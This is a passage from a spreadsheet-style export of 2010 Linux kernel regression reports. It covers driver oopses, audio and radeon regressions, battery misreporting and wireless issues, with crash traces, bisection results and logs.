    <t>There is device in /dev/ directory: ls -l /dev/noz* crw-rw---- 1 root dialout 251, 0 2010-05-05 11:31 /dev/noz0 crw-rw---- 1 root dialout 251, 1 2010-05-05 11:31 /dev/noz1 crw-rw---- 1 root dialout 251, 2 2010-05-05 11:31 /dev/noz2 crw-rw---- 1 root dialout 251, 3 2010-05-05 11:31 /dev/noz3 but trying to use it from any probram (pppd, comgt) gives: Can't open device /dev/noz0 and the dmesg has: Warning: dev (noz0) tty-&gt;count(0) != #fd's(1) in tty_open noz: activated 0: f685b860 BUG: unable to handle kernel NULL pointer dereference at 000000bc IP: [&lt;c046b03c&gt;] mutex_lock+0xc/0x30 *pde = 00000000 Oops: 0002 [#1] SMP last sysfs file: /sys/devices/pci0000:00/0000:00:14.4/0000:02:06.0/net/mon.wlan0 /flags Modules linked in: binfmt_misc xt_state xt_tcpudp ipt_MASQUERADE iptable_nat nf_ nat nf_conntrack_ipv4 nf_conntrack nf_defrag_ipv4 nozomi arc4 pcmcia ecb ath5k m ac80211 ath iptable_filter ppdev yenta_socket parport_pc rsrc_nonstatic r8169 ip _tables lp x_tables usbserial pcmcia_core mii shpchp parport cfg80211 i2c_piix4 k8temp led_class serio_raw Pid: 1429, comm: wvdial Not tainted 2.6.34-rc6-m03 #1 GA-MA69VM-S2/GA-MA69VM-S2 EIP: 0060:[&lt;c046b03c&gt;] EFLAGS: 00210296 CPU: 0 EIP is at mutex_lock+0xc/0x30 EAX: 000000bc EBX: 000000bc ECX: f4e1ec00 EDX: f685b800 ESI: 00001000 EDI: 000000bc EBP: 00000000 ESP: f68f5b18 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process wvdial (pid: 1429, ti=f68f4000 task=f60462e0 task.ti=f68f4000) Stack: 00000000 00001000 f802d3c5 f4e1ec00 00000000 f802d410 c02fda15 c02fb625 &lt;0&gt; f6ad2700 f4e1ec00 f6ba78b8 00000000 c02f7a9a f306bac0 c02fb4d0 00000004 &lt;0&gt; 00000010 f6ad2700 00000000 c01c67b7 f306bac0 00200286 ff000000 00000005 Call Trace: [&lt;f802d3c5&gt;] ? ntty_write_room+0x45/0x90 [nozomi] [&lt;f802d410&gt;] ? ntty_write+0x0/0x1f0 [nozomi] [&lt;c02fda15&gt;] ? tty_write_room+0x15/0x20 [&lt;c02fb625&gt;] ? n_tty_poll+0x155/0x170 [&lt;c02f7a9a&gt;] ? tty_poll+0x6a/0x80 [&lt;c02fb4d0&gt;] ? n_tty_poll+0x0/0x170 [&lt;c01c67b7&gt;] ? do_select+0x2b7/0x4f0 [&lt;c01c6f30&gt;] ? __pollwait+0x0/0xf0 [&lt;c028c569&gt;] ? elv_rb_add+0x79/0x90 [&lt;c029904c&gt;] ? cfq_insert_request+0x46c/0x4f0 [&lt;c02a1516&gt;] ? vsnprintf+0xb6/0x7f0 [&lt;c03d1972&gt;] ? raw_pci_write+0x82/0x90 [&lt;c014f22b&gt;] ? up+0xb/0x40 [&lt;c01368eb&gt;] ? release_console_sem+0x1ab/0x1f0 [&lt;c01b488d&gt;] ? __mem_cgroup_try_charge+0x5d/0x400 [&lt;c061ffff&gt;] ? powernow_cpu_init+0x16/0x426 [&lt;c02a07db&gt;] ? string+0x3b/0xd0 [&lt;c046a164&gt;] ? printk+0x17/0x1b [&lt;f802be4e&gt;] ? ntty_activate+0x7e/0xf0 [nozomi] [&lt;c012a262&gt;] ? __wake_up+0x42/0x60 [&lt;c0300757&gt;] ? tty_port_block_til_ready+0x1e7/0x270 [&lt;c03008b9&gt;] ? tty_port_tty_set+0x39/0x60 [&lt;c014a400&gt;] ? autoremove_wake_function+0x0/0x40 [&lt;c02fa8f9&gt;] ? tty_open+0x279/0x530 [&lt;c031ddc2&gt;] ? kobj_lookup+0xf2/0x140 [&lt;c01c6ba3&gt;] ? core_sys_select+0x1b3/0x2b0 [&lt;c02fe899&gt;] ? tty_mode_ioctl+0xa9/0x420 [&lt;c02f9679&gt;] ? tty_ioctl+0xc9/0x7d0 [&lt;c0198e19&gt;] ? handle_mm_fault+0x139/0x9c0 [&lt;c02f95b0&gt;] ? tty_ioctl+0x0/0x7d0 [&lt;c01c480b&gt;] ? vfs_ioctl+0x2b/0xb0 [&lt;c01c49f9&gt;] ? do_vfs_ioctl+0x79/0x5c0 [&lt;c046f3a0&gt;] ? do_page_fault+0x0/0x3e0 [&lt;c046f544&gt;] ? do_page_fault+0x1a4/0x3e0 [&lt;c01c6e5f&gt;] ? sys_select+0x2f/0xb0 [&lt;c0102c10&gt;] ? sysenter_do_call+0x12/0x22 Code: 8b 74 24 24 8b 7c 24 28 8b 6c 24 2c 83 c4 30 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 83 ec 08 89 1c 24 89 c3 89 74 24 04 &lt;3e&gt; ff 08 79 05 e8 ba 00 00 00 89 e0 8b 74 24 04 25 00 e0 ff ff EIP: [&lt;c046b03c&gt;] mutex_lock+0xc/0x30 SS:ESP 0068:f68f5b18 CR2: 00000000000000bc ---[ end trace 6e73d3662da499c0 ]--- Warning: dev (noz0) tty-&gt;count(0) != #fd's(1) in tty_release_dev tty_release_dev: bad tty-&gt;count (-1) for noz0 strace comgt sig -d /dev/noz0 execve("/usr/local/bin/comgt", ["comgt", "sig", "-d", "/dev/noz0"], [/* 19 vars */]) = 0 brk(0) = 0x84d2000 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb77f7000 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=60969, ...}) = 0 mmap2(NULL, 60969, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb77e8000 close(3) = 0 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260l\1\0004\0\0\0"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=1319364, ...}) = 0 mmap2(NULL, 1329512, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb76a3000 mprotect(0xb77e1000, 4096, PROT_NONE) = 0 mmap2(0xb77e2000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13e) = 0xb77e2000 mmap2(0xb77e5000, 10600, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb77e5000 close(3) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb76a2000 set_thread_area({entry_number:-1 -&gt; 6, base_addr:0xb76a26c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 mprotect(0xb77e2000, 8192, PROT_READ) = 0 mprotect(0x8050000, 4096, PROT_READ) = 0 mprotect(0xb7815000, 4096, PROT_READ) = 0 munmap(0xb77e8000, 60969) = 0 time(NULL) = 1273052631 gettimeofday({1273052631, 353770}, NULL) = 0 ioctl(1, SNDCTL_TMR_TEMPO or TCGETA, {B38400 opost isig icanon echo ...}) = 0 brk(0) = 0x84d2000 brk(0x84f4000) = 0x84f4000 brk(0x84f3000) = 0x84f3000 open("/dev/noz0", O_RDWR|O_EXCL|O_NOCTTY|O_NONBLOCK) = -1 EIO (Input/output error) fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 1), ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb77f6000 write(1, "Can't open device /dev/noz0.\n", 29Can't open device /dev/noz0. ) = 29 ioctl(1, SNDCTL_TMR_SOURCE or TCSETA, {B38400 opost isig icanon echo ...}) = 0 exit_group(1) = ? Gnu C 4.4.1 Gnu make 3.81 binutils 2.20 util-linux 2.16 mount support module-init-tools 3.10 e2fsprogs 1.41.9 pcmciautils 014 PPP 2.4.5 Linux C Library 2.10.1 Dynamic linker (ldd) 2.10.1 Procps 3.2.8 Net-tools 1.60 Kbd 1.15 Sh-utils 7.4 wireless-tools 29 Modules Loaded ipt_REDIRECT ppp_async crc_ccitt binfmt_misc arc4 ecb xt_state xt_tcpudp ipt_MASQUERADE iptable_nat nf_nat nf_conntrack_ipv4 nozomi nf_conntrack nf_defrag_ipv4 ath5k mac80211 ath iptable_filter ip_tables cfg80211 x_tables rfkill_backport pcmcia compat yenta_socket ppdev parport_pc rsrc_nonstaticlp pcmcia_core led_class parport usbserial serio_raw k8temp shpchp i2c_piix4 r8169 mii</t>
  </si>
  <si>
    <t>open("a/",O_NOFOLLOW) fails with ELOOP if "a" is a symbolic link to a directory.</t>
  </si>
  <si>
    <t>2010-05-05 13:01 UTC</t>
  </si>
  <si>
    <t>Marius Tolzmann</t>
  </si>
  <si>
    <t>2010-06-14 14:20 UTC</t>
  </si>
  <si>
    <t>mkdir c ln -s c a f=open("a/",O_RDONLY+O_NOFOLLOW) fails with ELOOP. However, this open should behave like open("a/.") not like open("a") according to path_resolution(7). In kernel version 2.6.32 the open worked as documented. On a higher level this bug makes find a/ to fail.</t>
  </si>
  <si>
    <t>kacpid consumes ~100% CPU, system freezes randomly</t>
  </si>
  <si>
    <t>2.6.34 RC6</t>
  </si>
  <si>
    <t>2010-05-06 21:12 UTC</t>
  </si>
  <si>
    <t>Jaroslav Kameník</t>
  </si>
  <si>
    <t>Created attachment 26268 [details] acpidump hardware: laptop HP 8540w (i7 620M, 8GB ram, BIOS F.06) I found this problem on OpenSuse 11.3 M5 and M6 with kernels 2.6.34 RC3 and 2.6.34 RC5 but it persists even with original 2.6.34 RC6 from kernel.org. (We discussed it on OSS bugzilla - https://bugzilla.novell.com/show_bug.cgi?id=601270) On OSS 11.3 M3 with older kernel 2.6.33.3 problem didn't occure. I found that after dissabling USB port in BIOS kacpid stops to consume CPU. Laptop has USB3 ports, so maybe problem is there...</t>
  </si>
  <si>
    <t>Suspicious rcu_dereference_check() usage detected during 2.6.34-rc6 boot on PPC64/p5 processor</t>
  </si>
  <si>
    <t>2010-05-07 14:16 UTC</t>
  </si>
  <si>
    <t>2010-06-27 21:52 UTC</t>
  </si>
  <si>
    <t>Subject : Suspicious rcu_dereference_check() usage detected during 2.6.34-rc6 boot on PPC64/p5 processor Submitter : Subrata Modak &lt;subrata@linux.vnet.ibm.com&gt; Date : 2010-05-06 7:29 Message-ID : 1273130279.4898.5.camel@subratamodak.linux.ibm.com References : http://marc.info/?l=linux-kernel&amp;m=127313031922395&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Xonar D1 front panel microphone cannot be activated</t>
  </si>
  <si>
    <t>2010-05-08 18:17 UTC</t>
  </si>
  <si>
    <t>2010-12-08 08:57 UTC</t>
  </si>
  <si>
    <t>Hardware: ASUS Xonar D1 PCI 7.1 Audio Card Distribution: archlinux Kernel version: 2.6.33.3 (vanilla kernel, not ARCH kernel) Alsa-lib version: 1.0.23-1 Alsa-utils version: 1.0.23-2 alsa-info.sh outputs of both working and broken kernel driver versions will be attached. It is not possible to record anything from my front panel microphone jack after I updated kernel to 2.6.33. It still works OK with kernel 2.6.32.10, but does not work with 2.6.33.3. The front panel switch in alsamixer switches only output but not input (mic) now. Before, the switch had impact on both output and input. When I activate the back panel on the card then everything is working well (back panel connectors are active, front panel connectors are inactive). When I activate the front panel then the front panel microphone is not working (back panel microphone works). The alsamixer front panel switch does not have impact on the microphone any more and no switch was added to control the microphone separately from the output. I use 32 bit kernels. My brother uses 64 bit kernels and the problem is the same for him too. Although he uses Xonar DX. I tried to limit the commit which introduced the error. Here is the result: * I cloned the git tree of vanilla kernel 2.6.33.3 (the one which I use and has the broken front panel microphone) * I checked out sound/pci/oxygen drivers to the latest one working (git checkout 362bc24d6746bcd49bb4853fc5aa7d4c728b3f9e -- sound/pci/oxygen); built them, added them to my modules as updates and loaded to my kernel; verified that the front panel microphone works * then I checked out the next revision (65c3ac885ce9852852b895a4a62212f62cb5f2e9) of sound/pci/oxygen; built them, added them to my modules as updates and loaded to my kernel; verified that the front panel microphone does not work From this I assume this is the commit which broke front panel microphone: Commit: 65c3ac885ce9852852b895a4a62212f62cb5f2e9 Name: "sound: virtuoso: split virtuoso.c" Author: Clemens Ladisch &lt;clemens@ladisch.de&gt; 2009-09-28 11:11:27 I posted to alsa-devel list too but nobody responded. I assume that means this is a kernel error and not user space error.</t>
  </si>
  <si>
    <t>commit 9630bdd9 changes behavior of the poweroff</t>
  </si>
  <si>
    <t>2010-05-09 21:41 UTC</t>
  </si>
  <si>
    <t>2010-06-27 21:48 UTC</t>
  </si>
  <si>
    <t>Subject : commit 9630bdd9 changes behavior of the poweroff - bug? Submitter : Michal Hocko &lt;mhocko@suse.cz&gt; Notify-Also : Tony Vroon &lt;tony@linx.net&gt; Date : 2010-04-01 13:39 Message-ID : 20100401133923.GA4104@tiehlicka.suse.cz References : http://marc.info/?l=linux-kernel&amp;m=127012918316305&amp;w=4 Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>I/O port range not assigned, BIOS allocation gets lost</t>
  </si>
  <si>
    <t>2010-05-11 15:09 UTC</t>
  </si>
  <si>
    <t>Clemens Ladisch</t>
  </si>
  <si>
    <t>2012-04-04 15:05 UTC</t>
  </si>
  <si>
    <t>(bug report originally from &lt;https://bugtrack.alsa-project.org/alsa-bug/view.php?id=4982&gt;:) After upgrading kernel from 2.6.32 to 2.6.34-rc4 my Xonar DX stopped working. Kernel log has: [kernel] AV200 0000:09:04.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 [kernel] invalid PCI I/O range [kernel] AV200 0000:09:04.0: PCI INT A disabled [kernel] ALSA device list: [kernel] No soundcards found. According to git bisect the culprit is (from 2.6.34-rc1): commit 977d17bb1749517b353874ccdc9b85abc7a58c2a Author: Yinghai Lu &lt;yinghai@kernel.org&gt; Date: Fri Jan 22 01:02:24 2010 -0800 PCI: update bridge resources to get more big ranges in PCI assign unssigned lkml thread ("[regression, bisected] Xonar DX invalid PCI I/O range since 977d17bb174"): http://lkml.org/lkml/2010/4/19/20</t>
  </si>
  <si>
    <t>BUG: rtc_cmos (2.6.34-rc7)</t>
  </si>
  <si>
    <t>2010-05-11 18:24 UTC</t>
  </si>
  <si>
    <t>2010-06-13 11:46 UTC</t>
  </si>
  <si>
    <t>Subject : BUG: rtc_cmos (2.6.34-rc7) Submitter : Randy Dunlap &lt;randy.dunlap@oracle.com&gt; Date : 2010-05-10 23:09 Message-ID : 4BE89243.8090809@oracle.com References : http://marc.info/?l=linux-kernel&amp;m=127353313728385&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>radeon regression couldn't schedule IB on resume with 2.6.34-rc7</t>
  </si>
  <si>
    <t>2010-05-13 19:06 UTC</t>
  </si>
  <si>
    <t>2010-06-13 11:54 UTC</t>
  </si>
  <si>
    <t>Created attachment 26367 [details] kernel config Hello, When resuming my laptop from a -rc7, my X session reacted weirdly. Reading the dmesg log, I had : May 12 21:58:03 enea kernel: [ 122.627332] [drm:radeon_ib_schedule] *ERROR* radeon: couldn't schedule IB(0). May 12 21:58:03 enea kernel: [ 122.627342] [drm:radeon_cs_ioctl] *ERROR* Faild to schedule IB ! May 12 21:58:03 enea kernel: [ 123.251198] [drm:radeon_ib_schedule] *ERROR* radeon: couldn't schedule IB(1). May 12 21:58:03 enea kernel: [ 123.251207] [drm:radeon_cs_ioctl] *ERROR* Faild to schedule IB ! May 12 21:58:04 enea kernel: [ 123.626341] [drm:radeon_ib_schedule] *ERROR* radeon: couldn't schedule IB(2). May 12 21:58:04 enea kernel: [ 123.626351] [drm:radeon_cs_ioctl] *ERROR* Faild to schedule IB ! May 12 21:58:04 enea kernel: [ 124.256505] [drm:radeon_ib_schedule] *ERROR* radeon: couldn't schedule IB(3). May 12 21:58:04 enea kernel: [ 124.256514] [drm:radeon_cs_ioctl] *ERROR* Faild to schedule IB ! May 12 21:58:05 enea kernel: [ 124.626191] [drm:radeon_ib_schedule] *ERROR* radeon: couldn't schedule IB(4). May 12 21:58:05 enea kernel: [ 124.626200] [drm:radeon_cs_ioctl] *ERROR* Faild to schedule IB ! May 12 21:58:05 enea kernel: [ 125.059095] [drm:radeon_ib_schedule] *ERROR* radeon: couldn't schedule IB(5). And so on until IB(15) This was not the case with a -rc5 kernel nor with a kernel without KMS (radeon.modeset=0). Bisection gives me (on drivers/gpu): # bad: [b57f95a38233a2e73b679bea4a5453a1cc2a1cc9] Linux 2.6.34-rc7 # good: [01bf0b64579ead8a82e7cfc32ae44bc667e7ad0f] Linux 2.6.34-rc5 git bisect start 'v2.6.34-rc7' 'v2.6.34-rc5' '--' 'drivers/gpu/' # bad: [3515387ba90ef2c38602f4d52c4d5ec5fc95ae5c] drm/radeon/kms: fix panel scaling adjusted mode setup git bisect bad 3515387ba90ef2c38602f4d52c4d5ec5fc95ae5c # good: [88b045077a1462a47503137fd4ca0c31772819ca] drm/radeon: Fix sparc regression in r300_scratch() git bisect good 88b045077a1462a47503137fd4ca0c31772819ca # bad: [404b017d00a9f472bdf725a06892d42f1cba5ed8] drivers/gpu/drm/drm_memory.c: fix check for end of loop git bisect bad 404b017d00a9f472bdf725a06892d42f1cba5ed8 # bad: [ccb2ad579f910e6146adf4eb3aa50325253ee8c9] drm/radeon/kms/agp The wrong AGP chipset can cause a NULL pointer dereference git bisect bad ccb2ad579f910e6146adf4eb3aa50325253ee8c9 with 797fd5b9dad12a100c81b5782573a41259728cb1 being the culprit commit 797fd5b9dad12a100c81b5782573a41259728cb1 Author: Marek Olšák &lt;maraeo@gmail.com&gt; Date: Tue Apr 13 02:33:36 2010 +0200 drm/radeon/kms: r300 fix CS checker to allow zbuffer-only fastfill Signed-off-by: Marek Olšák &lt;maraeo@gmail.com&gt;</t>
  </si>
  <si>
    <t>BUG: amd64-agp (2.6.34-rc7)</t>
  </si>
  <si>
    <t>2010-05-13 19:43 UTC</t>
  </si>
  <si>
    <t>2010-06-15 00:18 UTC</t>
  </si>
  <si>
    <t>Subject : BUG: amd64-agp (2.6.34-rc7) Submitter : Randy Dunlap &lt;randy.dunlap@oracle.com&gt; Date : 2010-05-11 20:56 Message-ID : 4BE9C469.2020901@oracle.com References : http://marc.info/?l=linux-kernel&amp;m=127361149610881&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Eeepc 900 reports incorrect battery status</t>
  </si>
  <si>
    <t>2010-05-15 19:30 UTC</t>
  </si>
  <si>
    <t>Ferry Toth</t>
  </si>
  <si>
    <t>2010-11-02 02:55 UTC</t>
  </si>
  <si>
    <t>On eeepc 900 (and possibly other variants) the battery status is incorrectly reported, possibly do to a mixup of units. With power plugged in and battery fully charged: $ cat /proc/acpi/battery/BAT0/info present: yes design capacity: 5200 mAh last full capacity: 100 mAh battery technology: rechargeable design voltage: 8400 mV design capacity warning: 20 mAh design capacity low: 10 mAh capacity granularity 1: 52 mAh capacity granularity 2: 52 mAh model number: 900 serial number: battery type: LION OEM info: ASUS $ cat /proc/acpi/battery/BAT0/state present: yes capacity state: ok charging state: charged present rate: unknown remaining capacity: 100 mAh present voltage: 8326 mV last full capacity remaining capacity are reported by asus in % there may be a similar problem with granularity As a result of the above ubuntu reports a broken battery on each login and remaining battery time is incorrectly estimated. Additional info might be obtained from asus linux kernel sources? Ferry</t>
  </si>
  <si>
    <t>radeon module update for 2.6.34 breaks ALSA (snd_atiixp and snd_hda_intel)</t>
  </si>
  <si>
    <t>2010-05-16 08:41 UTC</t>
  </si>
  <si>
    <t>Sylvia</t>
  </si>
  <si>
    <t>2010-06-13 11:38 UTC</t>
  </si>
  <si>
    <t>Playing sound via ATI IXP SB400 card does not work, qmmp player reports buffer underruns with ALSA, other (sox for example) applications just hangs, its possible to hear sound via FMOD , but its noisy and jerky Last worked: 2.6.33.4 , doesnt work for mainline 2.6.34 (tried with rc6 and rc7-git9) lspci -vv : 00:14.5 Multimedia audio controller: ATI Technologies Inc IXP SB400 AC'97 Audio Controller (rev 02) Subsystem: ASUSTeK Computer Inc. Device 1183 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=slow &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (500ns min), Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 10 Region 0: Memory at febfcc00 (32-bit, non-prefetchable) [size=256] Capabilities: &lt;access denied&gt; Kernel driver in use: ATI IXP AC97 controller Kernel modules: snd-atiixp $ lsmod Module Size Used by af_packet 14550 2 ramzswap 11293 1 lzo_decompress 1921 1 ramzswap lzo_compress 1638 1 ramzswap fuse 46778 5 lm85 13313 0 hwmon_vid 1916 1 lm85 hwmon 1053 1 lm85 rfcomm 28298 0 l2cap 28430 3 rfcomm bluetooth 41839 2 rfcomm,l2cap snd_seq_oss 21061 0 snd_seq_midi_event 3924 1 snd_seq_oss snd_seq 34905 4 snd_seq_oss,snd_seq_midi_event snd_seq_device 3849 2 snd_seq_oss,snd_seq snd_pcm_oss 31107 0 snd_mixer_oss 11422 1 snd_pcm_oss arc4 946 2 ecb 1401 2 cryptomgr 85846 0 crypto_hash 8171 1 cryptomgr aead 3651 1 cryptomgr pcompress 857 1 cryptomgr crypto_blkcipher 7367 2 ecb,cryptomgr crypto_algapi 9122 7 arc4,ecb,cryptomgr,crypto_hash,aead,pcompress,crypto_blkcipher rt2500pci 11701 0 rt2x00pci 4101 1 rt2500pci rt2x00lib 17608 2 rt2500pci,rt2x00pci mac80211 118215 2 rt2x00pci,rt2x00lib cfg80211 100901 2 rt2x00lib,mac80211 rfkill 10896 2 bluetooth,cfg80211 snd_atiixp 9825 1 eeprom_93cx6 904 1 rt2500pci snd_atiixp_modem 7115 0 usbhid 15253 0 pcmcia 24282 0 snd_ac97_codec 82624 2 snd_atiixp,snd_atiixp_modem asus_laptop 12148 0 joydev 7320 0 ac97_bus 702 1 snd_ac97_codec mmc_block 6664 0 sdhci_pci 5250 0 sdhci 13041 1 sdhci_pci yenta_socket 18247 2 snd_pcm 53401 4 snd_pcm_oss,snd_atiixp,snd_atiixp_modem,snd_ac97_codec rtc_cmos 7454 0 snd_timer 14278 2 snd_seq,snd_pcm mmc_core 39614 2 mmc_block,sdhci ehci_hcd 32254 0 ohci_hcd 19709 0 video 14806 0 snd 35728 12 snd_seq_oss,snd_seq,snd_seq_device,snd_pcm_oss,snd_mixer_oss,snd_atiixp,snd_atiixp_modem,snd_ac97_codec,snd_pcm,snd_timer backlight 2648 2 asus_laptop,video rtc_core 9613 1 rtc_cmos rsrc_nonstatic 8269 1 yenta_socket thermal 9230 0 ac 1528 0 processor 18341 1 8139too 15014 0 battery 3686 0 soundcore 4303 1 snd ppdev 5026 0 output 1164 1 video parport_pc 28009 0 parport 23883 2 ppdev,parport_pc rtc_lib 1402 1 rtc_core evdev 6269 13 led_class 1789 3 rt2x00lib,asus_laptop,sdhci sg 19333 0 button 3494 0 usbcore 109287 3 usbhid,ehci_hcd,ohci_hcd pcmcia_core 22624 3 pcmcia,yenta_socket,rsrc_nonstatic snd_page_alloc 5185 3 snd_atiixp,snd_atiixp_modem,snd_pcm psmouse 28785 0 sr_mod 9830 0 pcspkr 1299 0 i2c_piix4 7680 0 mii 2850 1 8139too cdrom 27927 1 sr_mod nls_base 4761 1 usbcore</t>
  </si>
  <si>
    <t>No wlan0 device after insert a AR9271 sometimes</t>
  </si>
  <si>
    <t>2010-05-18 05:58 UTC</t>
  </si>
  <si>
    <t>mhpmhp2003</t>
  </si>
  <si>
    <t>2010-06-14 13:41 UTC</t>
  </si>
  <si>
    <t>For AR9271 USB dongle ,I download the driver from website that name compat-wireless-2010-03-28.tar.bz2 and compact-wireless-2010-5-12. tar.gz2 and ar9271.fw. We found that there are some problem in Ubuntu 9.04 (Linux 2.6.28 ) after install Ubuntu 9.04 and inter OS with root, copy ar9271.fw to /lib/firmware; Run the command #apt-get update (to install the patch command) #./scripts/driver-select ath9k_htc #make #make install ,then reboot OS .after OS boot ok ,insert AR9271. it happen two questions . 1. sometimes when insert dongle terminal debug information list : [ 75.551724] usb 2-2: firmware: requesting ar9271.fw [ 75.940390] usb 2-2: ath9k_htc: Transferred FW: ar9271.fw, size: 53368 Then not other information output.and no wlan0 device. 2.sometimes [ 75.551724] usb 2-2: firmware: requesting ar9271.fw [ 75.940390] usb 2-2: ath9k_htc: Transferred FW: ar9271.fw, size: 53368 [ 77.788056] ath: EEPROM regdomain: 0x0 [ 77.788060] ath: EEPROM indicates default country code should be used [ 77.788063] ath: doing EEPROM country-&gt;regdmn map search [ 77.788067] ath: country maps to regdmn code: 0x3a [ 77.788070] ath: Country alpha2 being used: US [ 77.788072] ath: Regpair used: 0x3a [ 77.842310] cfg80211: Calling CRDA for country: US [ 77.846003] Registered led device: ath9k-phy0::radio [ 77.846029] Registered led device: ath9k-phy0::assoc [ 77.846053] Registered led device: ath9k-phy0::tx [ 77.846076] Registered led device: ath9k-phy0::rx [ 77.846080] usb 2-2: ath9k_htc: USB layer initialized [ 77.846105] usbcore: registered new interface driver ath9k_hif_usb [ 77.855107] cfg80211: Regulatory domain changed to country: US [ 77.855113] (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp) [ 77.855117] (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2700 mBm) [ 77.855121] (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 1700 mBm) [ 77.855125] (5250000 KHz - 5330000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) [ 77.855128] (5490000 KHz - 5710000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) [ 77.855132] (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 3000 mBm)</t>
  </si>
  <si>
    <t>Kernel OOPS with Null pointer dereference after closing rfcomm connection to device which had gone away</t>
  </si>
  <si>
    <t>2.6.32-2.6.34</t>
  </si>
  <si>
    <t>2010-05-18 08:53 UTC</t>
  </si>
  <si>
    <t>vlad</t>
  </si>
  <si>
    <t>2011-03-30 23:48 UTC</t>
  </si>
  <si>
    <t>Created attachment 26420 [details] revert commit 9e726b17422bade75fba94e625cd35fd1353e682 How to reproduce: 1. Connect to mobile phone via bluetooth DUN service using wvdial 2. Move mobile phone away from bluetooth dongle receiver range and wait till it reports that connection was closed. 3. wvdial will hand with output like this: --&gt; WvDial: Internet dialer version 1.60 --&gt; Cannot get information for serial port. --&gt; Initializing modem. --&gt; Sending: ATZ ATZ OK --&gt; Sending: at+cgdcont=1,"IP","internet.beeline.ru" at+cgdcont=1,"IP","internet.beeline.ru" OK --&gt; Modem initialized. --&gt; Sending: ATDT*99***1# --&gt; Waiting for carrier. ATDT*99***1# CONNECT ~[7f]}#@!}!} } }2}#}$@#}!}$}%\}"}&amp;} }*} } g}%~ --&gt; Carrier detected. Waiting for prompt. ~[7f]}#@!}!} } }2}#}$@#}!}$}%\}"}&amp;} }*} } g}%~ --&gt; PPP negotiation detected. --&gt; Starting pppd at Tue May 18 12:15:15 2010 --&gt; Warning: Could not modify /etc/ppp/pap-secrets: Permission denied --&gt; --&gt; PAP (Password Authentication Protocol) may be flaky. --&gt; Warning: Could not modify /etc/ppp/chap-secrets: Permission denied --&gt; --&gt; CHAP (Challenge Handshake) may be flaky. --&gt; Pid of pppd: 6714 --&gt; Using interface ppp0 --&gt; pppd: �k[06][08]�k[06][08]ligent PPP dialer.[0b]Optional SECTION arguments refer to sections in configuration file (usually) --&gt; /etc [01] --&gt; pppd: �k[06][08]�k[06][08]ligent PPP dialer.[0b]Optional SECTION arguments refer to sections in configuration file (usually) --&gt; /etc [01] --&gt; pppd: �k[06][08]�k[06][08]ligent PPP dialer.[0b]Optional SECTION arguments refer to sections in configuration file (usually) --&gt; /etc [01] --&gt; pppd: �k[06][08]�k[06][08]ligent PPP dialer.[0b]Optional SECTION arguments refer to sections in configuration file (usually) --&gt; /etc [01] --&gt; local IP address 10.198.21.112 --&gt; pppd: �k[06][08]�k[06][08]ligent PPP dialer.[0b]Optional SECTION arguments refer to sections in configuration file (usually) --&gt; /etc [01] --&gt; remote IP address 10.6.6.6 --&gt; pppd: �k[06][08]�k[06][08]ligent PPP dialer.[0b]Optional SECTION arguments refer to sections in configuration file (usually) --&gt; /etc [01] --&gt; primary DNS address 217.118.66.243 --&gt; pppd: �k[06][08]�k[06][08]ligent PPP dialer.[0b]Optional SECTION arguments refer to sections in configuration file (usually) --&gt; /etc [01] --&gt; secondary DNS address 217.118.66.244 --&gt; pppd: �k[06][08]�k[06][08]ligent PPP dialer.[0b]Optional SECTION arguments refer to sections in configuration file (usually) --&gt; /etc [01] --&gt; pppd: �k[06][08]�k[06][08]ligent PPP dialer.[0b]Optional SECTION arguments refer to sections in configuration file (usually) --&gt; /etc [01] --&gt; Connect time 0.1 minutes. --&gt; pppd: �k[06][08]�k[06][08]ligent PPP dialer.[0b]Optional SECTION arguments refer to sections in configuration file 